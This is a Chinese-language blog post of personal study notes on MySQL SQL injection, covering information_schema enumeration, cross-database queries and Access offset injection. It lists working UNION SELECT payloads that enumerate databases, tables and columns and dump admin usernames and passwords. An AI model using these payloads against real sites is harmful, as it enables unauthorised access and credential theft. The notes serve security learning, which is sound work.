1、WEB攻防-通用漏洞&SQL注入&MYSQL跨库&ACCESS偏移

最新推荐文章于 2024-07-18 16:32:46 发布
最新推荐文章于 2024-07-18 16:32:46 发布
阅读量1.3k 收藏 22
点赞数 43
分类专栏: Web攻防 文章标签: sql mysql 数据库 网络安全 sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65842464/article/details/136240407
版权
本文介绍了MYSQL数据库的安全措施,包括非ROOT用户和ROOT用户注入攻击的原理,以及如何通过SQL注入进行黑盒和白盒测试。重点讲解了如何利用information_schema数据库获取敏感信息,如表名、列名,以及针对不同版本的防御策略和跨库查询注入实例。
摘要由CSDN通过智能技术生成

用途:个人学习笔记,欢迎指正!

前言:

为了网站和数据库的安全性,MYSQL 内置有 ROOT 最高用户,划分等级,每个用户对应管理一个数据库,这样保证无不关联,从而不会影响到其他数据库的运行。

MYSQL 两种思路:
ROOT 的注入攻击:常规类的猜解
ROOT 用户的注入攻击:文件读写操作,跨库查询注入等

SQL注入原理:

用户端提交的数据包中有可以控制的变量,而这个变量没有被过滤直接拼接到SQL语句中在数据库解析执行,从而通过构造这个变量使得拼接后的SQL语句可以额外对数据库做一些其他攻击操作。
或者说:sql 注入攻击是通过将恶意的 sql 查询或添加语句插入到应用的输入参数中,再在后台 sql 服务器上解析 执行进行的攻击。
黑盒测试中可以采用 user()获取当前用户权限,白盒中看连接用户即可!
select * from product where id=1513
select * from product where id=1513
查询 admin 表名:
UNION select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
查询 admin 表名下的 admin 等列名
UNION select 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
MYSQL5.0 以上版本:自带的数据库名 information_schema
information_schema :存储数据库下的数据库名及表名,列名信息的数据库
information_schema.tables :记录表名信息的表
information_schema.columns :记录列名信息表
information_schema.tables
获取相关数据:
1 、数据库版本 - 看是否符合 information_schema 查询 -version()-5.5.532
2 、数据库用户 - 看是否符合 ROOT 型注入攻击 -user()-root@localhost
3 、当前操作系统 - 看是否支持大小写或文件路径选择 -@@version_compile_os-win
4 、数据库名字 - 为后期猜解指定数据库下的表,列做准备 -database()-syguestbook

一、ROOT 类型攻击-猜解数据,文件读写,跨库查询

获取 syguestbook 数据库下面的表名信息: 

UNION SELECT table_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables where
table_schema='syguestbook'

获取表名 sy_adminuser 的列名信息:

UNION SELECT column_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns
where table_name='sy_adminuser' and table_schema='syguestbook'

获取指定数据: 

UNION SELECT username,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from sy_adminuser

二、跨库注入:实现当前网站跨库查询其他数据库对应网站的数据

获取当前 mysql 下的所有数据库名 

UNION SELECT schema_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.schemata

获取数据库名 xhcms 下的表名信息 

UNION SELECT table_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables where
table_schema='xhcms'

获取数据库名 xhcms 下的表 manage 下的列名信息: 

UNION SELECT column_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns
where table_name='manage' and table_schema='xhcms'

获取指定数据: 

UNION SELECT user,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from xhcms.manage

三、小试牛刀 

 

#ASP+Access-简易注入-字典猜解

由于 Access 数据库特性导致这个 SQL 注入是需要借助字典去猜解表名和列名的,那么就会出现表名
或列名猜解不到,可以自定义社工字典或采用偏移注入!

#ASP+Access-偏移注入-报错显示

偏移注入就是解决表名已知,列名未知的情况!

 

++⁠⁠
关注
  • 43
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
第24天:WEB攻防-通用漏洞&SQL注入&MYSQL跨库&ACCESS偏移
wuqingsix的博客
11-17 475
access联合查询及偏移注入,mysql注入
小迪安全24WEB 攻防-通用漏洞&SQL 注入&MYSQL 跨库&ACCESS 偏移
weixin_73760178的博客
01-29 1091
SQL注入:传参id变量,通过$sql变量来进行指定的sql数据库查询,从而执行恶意的SQL语句,实现查询其他数据内容(敏感信息)**原理:**借用数据库的自连接查询(inner join)让数据库内部发生乱序,从而偏移出所需要的字段在我们的页面上显示。实现当前网站跨库查询其他网站——原理:因为是root用户会管理到所有的网站的数据库数据库中的操作能被其利用和破坏——增删改查——需符合SQL语句的逻辑格式。注:这里的联合查询是有限制的,就是union前后查询的数据必须保持同列。产生在数据库上的注入。
24、Web攻防——通用漏洞&SQL注入&MYSQL跨库&ACCESS偏移
qq_55202378的博客
12-30 1123
脚本代码在与数据库进行数据通讯时(从数据库取出相关数据进行页面显示),使用预定义的SQL查询语句进行数据查询。能通过参数传递自定义值来实现SQL语句的控制,执行恶意的查询操作,例如查询数据库中的管理员账户密码。2. 像登录注册窗口,虽然URL中没有参数,但是这种登录注册,脚本代码肯定会与数据库进行交互,不然它怎么知道你是真用户还是假用户。不同用户的权限不同,也就是说不同权限的用户能够查询的表不一样。跨库注入:实现当前网站跨库查询其他数据库对应的网站数据。二、测试SQL注入的地方。以上版本:自带数据库
WEB攻防-通用漏洞&SQL读写注入&ACCESS偏移注入&MYSQL&MSSQL&PostgreSQL
m0_65336233的博客
10-08 411
WEB攻防-通用漏洞&SQL读写注入&ACCESS偏移注入&MYSQL&MSSQL&PostgreSQL
第二十四天:WEB攻防-通用漏洞&SQL注入&MYSQL跨库&ACCESS偏移
m0_51322401的博客
01-23 545
脚本代码在实现代码与数据库进行数据通讯时(从数据库取出相关数据进行页面显示),将定义的SQL语句进行执行查询数据时。其中的SQL语句能通过参数传递自定义值来实现控制SQL语句,从而执行恶意的SQL语句,可以实现查询其他数据(数据库中的敏感数据,如管理员帐号密码)。这一个过程就可以叫做SQL注入漏洞
day24WEB攻防-通用漏洞&SQL注入&Access注入&MYSQL注入&MYSQL跨库
m0_69583059的博客
01-13 859
SQL注入漏洞:脚本代码在实现代码与数据库进行通讯时(从数据库取出相关数据进行页面显示),将定义的SQL语句进行执行查询数据时。其中的SQL语句能够通过参数传递自定义值来实现控制SQL语句,从而执行恶意的SQL语句,可以实现查询其他数据(数据库中的敏感信息,如管理员账号密码)。这一个过程叫做SQL注入漏洞 漏洞产生的根本条件:可控变量 特定函数http://xxxxx/xxx.asp 没有参数,不一定不存在注入http://xxxxx/xxx.asp ?id=xx 有参数 如果下面的URL地址测试
2、Web攻防-SQL注入-联合查询注入
m0_65842464的博客
02-23 1147
判断注入点——》判断注入类型(数字型或字符型)——》判断字段数——》判断显示位——》确定数据库名——》确定数据库的表名——》确定数据库的列名——》确定数据库的字段名——》获取数据。id=1 and 1=1--+ 页面 正常 --+:SQL语句的注释符,注释符号后面的语句不执行。:报错注入就是利用了数据库的某些机制,人为的制造错误的条件,使得查询的结果能够出现在报错页面错误的信息中。(1)URL地址中的注入点,网址类似 :main.php?id=1等id值可注入的页面。
通杀! 熬夜码的 - 八万字 - 让你一文读懂SQL注入漏洞原理及各种场景利用
易编橙 · 终身成长社群,相遇已是上上签!
10-24 1487
WEB攻防漏洞的本质 漏洞特定函数: 漏洞的成因必然会涉及到所用的函数,不同的开发语言都有一些特定的函数用于不同的作用。 有些函数用于数据库查询,有的函数用于文件读写,有的函数用于调试输出等。函数在使用的时候会和漏洞形成的关系是什么? 漏洞产生的原因必定会使用到类似的脚本语言的特定函数,比如SQL注入漏洞,必然会涉及到数据库查询操作类的相关函数。 这就是漏洞的特定函数。所以在代码层,我们就可以通过函数猜解存在有那些漏洞,反推也可以根据漏洞猜解使用了哪些特定函数。 传输可
WEB漏洞攻防 -根据不同数据库类型之间的差异性进行注入
易编橙 · 终身成长社群,相遇已是上上签!
07-28 719
文章目录根据不同数据库类型之间的差异性进行注入SQL注入-Fuzz字典使用说明Access数据库联合&偏移注入MYSQL数据库注入检测利用墨者靶场MYSQL注入演示实例PostgreSQL数据库注入检测利用墨者靶场PostgreSQL注入演示实例SQLite数据库注入检测利用DB2数据库注入检测利用墨者靶场DB2数据库注入演示实例Oracle数据库联合注入墨者靶场Oracle数据库注入演示实例Mongodb数据库闭合注入墨者靶场Mongodb数据库注入演示实例Sybase数据库联合注入墨者靶场Syb
CVE-2022-22980 exp && 靶场.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
第80天:红蓝对抗-AWD模式&准备&攻防&监控&批量1
08-03
- **案例3**:代码审计结合漏洞库可以快速识别和修复安全漏洞。 - **案例4**:文件监控能实时防止恶意操作,保护系统完整性。 - **案例5**:批量Flag获取脚本结合权限维持技术,确保持续得分。 7. **资源参考**...
Access数据库SQL注入攻防技术研究 (1).pdf
09-19
SQL注入攻击是一种网络安全威胁,尤其针对使用Access数据库的ASP+IIS网站架构。Access数据库因其低成本和易于管理的特性,被广泛应用在个人、公司、企事业单位甚至政府网站中。然而,这种架构的安全性相对较低,如果...
SXU-网络攻防第六次作业-sql注入进阶
12-27
SQL注入是一种常见的网络安全漏洞,它允许攻击者通过构造恶意的SQL语句来操纵数据库,获取敏感信息或控制数据库系统。本篇将详细讲解在“SXU-网络攻防第六次作业”中涉及的四种SQL注入类型:报错注入、时间注入、堆...
PostgreSQL的Json数据类型如何使用
招风的黑耳CSDN
07-18 282
PostgreSQL中的JSON数据类型提供了一种灵活的方式来存储JSON(JavaScript Object Notation)数据。JSON是一种轻量级的数据交换格式,易于人阅读和编写,同时也易于机器解析和生成。在PostgreSQL中,你可以使用JSON和JSONB(JSON的二进制格式,支持索引和更快的查询)数据类型来存储JSON数据。
SQL Server设置定时作业调度Schedule
Cachel Wood的博客
07-15 381
在“步骤”选项卡中,单击“新建”按钮,然后输入步骤的名称和描述。在“计划”选项卡中,单击“新建”按钮来创建一个新的计划。代理将在指定的时间和频率下运行作业,并执行您定义的。右键单击“作业”文件夹,然后选择“新建作业”。在“作业属性”对话框中,输入作业的名称和描述。代理的功能,可以用来设置定时作业。在“命令”文本框中,输入要定期执行的。现在,您已经成功设置了一个定时作业。连接到要设置定时作业的数据库实例。设置每天早上八点执行这个定时任务。在对象资源管理器中,展开“
PostgreSQL的逻辑架构
最新发布
weixin_41992498的博客
07-18 105
一、PostgreSql的逻辑架构:所有者:
SQL Server详细使用教程(包含启动SQL server服务、建立数据库、建表的详细操作) 非常适合初学者
hackeroink的博客
07-15 1030
本文主要详细介绍SQL server2019的简单使用,以《数据库系统概论(第5版)》的第79页—第80页为例,详细介绍如何使用SQL server2019这款数据库软件,包括启动SQL server服务,建立数据库(学生—课程模式S-T),建立课程表等,内容比较简单,容易理解,适合广大初学者了解SQL server的简单使用。不会涉及到复杂的语法知识,如果有也会详细解释的!下文标红的字请重点关注一下!本文的需要建表的数据如下:2.Course课程号Cno课程名Cname先行课Cpno学分。
NoSql选择题解
2301_79659699的博客
07-16 613
5. (单选题, 3分)MongoDB是一种NoSQL数据库,具体地说,是( )存储数据库。13. (单选题, 3分)CAP理论是NoSQL理论的基础,下列性质不属于CAP的是( )。7. (单选题, 3分)CAP理论是NoSQL理论的基础,下列性质不属于CAP的是( )。11. (单选题, 3分)下列关于NoSQL数据库和关系型数据库的比较,不正确的是( )。8. (单选题, 3分)于NoSQL数据库和关系数据库,下列说法不正确的是( )。6. (单选题, 3分)NoSQL数据库是指( )数据存储系统。
SQL注入攻防手册:MySQL与MSSQL函数与技巧
"这篇文档是关于手工SQL注入的常用语句和技巧的笔记,主要针对MySQL,也涉及了一些MSSQL的相关知识。" 在网络安全领域,SQL注入是一种常见的攻击手段,通过利用应用程序对用户输入数据的不当处理,使得恶意用户能够...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

++⁠⁠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值